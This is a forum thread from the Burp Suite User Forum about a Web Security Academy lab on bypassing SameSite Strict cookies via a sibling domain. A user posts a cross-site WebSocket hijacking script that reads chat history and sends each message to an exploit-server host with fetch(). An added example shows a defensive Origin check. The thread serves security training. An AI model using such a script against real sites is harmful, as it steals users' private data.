The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

Lab: SameSite Strict bypass via sibling domain

ghx000 | Last updated: Aug 17, 2024 05:14PM UTC

Hi, I'm trying to solve this lab: Lab: SameSite Strict bypass via sibling domain. Here's my script:

```html
<script>
    // Create a new WebSocket object that points to /chat endpoint
    var webSocket = new WebSocket('wss://0a4600ca03a81a23827d33e900660069.web-security-academy.net/chat');

    webSocket.onopen = function() {
        // Send "READY" message to /chat to render the chat history
        webSocket.send("READY");
    };

    webSocket.onmessage = function(event) {
        // Send a GET request with the chat history to exploit server
        fetch('https://exploit-0ad2004c034c1a9782d3321801630010.exploit-server.net/?' + event.data, {method: 'GET'});
    };
</script>
```

But the resulting chat history for me is just like this:

{%22user%22:%22CONNECTED%22,%22content%22:%22--%20Now%20chatting%20with%20Hal%20Pline%20--%22}

Any tips or hints that help?
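For the defensive side of the lab topic above, an added example (not part of the original thread or of PortSwigger's lab material): SameSite=Strict withholds the session cookie from a cross-site WebSocket handshake, but a sibling subdomain counts as same-site, so a cookie-authenticated WebSocket endpoint also needs an exact Origin check at handshake time. The hostnames and function names are constructed placeholders, and the "last two labels" site calculation is a simplifying assumption in place of the Public Suffix List.

```javascript
// Added example: handshake-time Origin check for a cookie-authenticated WebSocket.
// Hostnames are constructed placeholders, not the lab's.
const TARGET_ORIGIN = 'https://app.example.test';
const ALLOWED_ORIGINS = new Set([TARGET_ORIGIN]);

// Simplified "site" = scheme + last two host labels.
// Assumption: real browsers use the Public Suffix List for the registrable domain.
function siteOf(origin) {
  const u = new URL(origin);
  return u.protocol + '//' + u.hostname.split('.').slice(-2).join('.');
}

// Would a SameSite=Strict cookie accompany a handshake started from this origin?
function strictCookieSent(initiatorOrigin, targetOrigin) {
  return siteOf(initiatorOrigin) === siteOf(targetOrigin);
}

// Server-side decision on the Origin request header of the upgrade request.
function acceptHandshake(originHeader) {
  if (typeof originHeader !== 'string') return false; // header absent
  let parsed;
  try {
    parsed = new URL(originHeader);
  } catch {
    return false; // "null" or malformed value
  }
  // Exact match on the serialized origin; no suffix or substring matching.
  return parsed.origin === originHeader && ALLOWED_ORIGINS.has(parsed.origin);
}

// Combine both views for one initiating origin.
function evaluate(initiatorOrigin) {
  return {
    cookieSent: strictCookieSent(initiatorOrigin, TARGET_ORIGIN),
    accepted: acceptHandshake(initiatorOrigin),
  };
}

// Constructed sample origins: unrelated site, sibling subdomain, the app itself.
for (const o of ['https://other-site.test', 'https://cms.example.test', TARGET_ORIGIN]) {
  console.log(o, evaluate(o));
}
```

The sibling-subdomain row is the case SameSite alone does not cover: the cookie is sent, and only the Origin check rejects the handshake.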

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 08:10AM UTC

Hi, to confirm, this lab requires the use of the Collaborator tool - are you using Burp Professional or Burp Community edition?

ghx000 | Last updated: Aug 19, 2024 09:29AM UTC

Hi, I'm using Community edition. I solved this lab with the help of the access log. Thanks for Reponde

ghx000 | Last updated: Aug 19, 2024 09:30AM UTC

Responde *

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 11:59AM UTC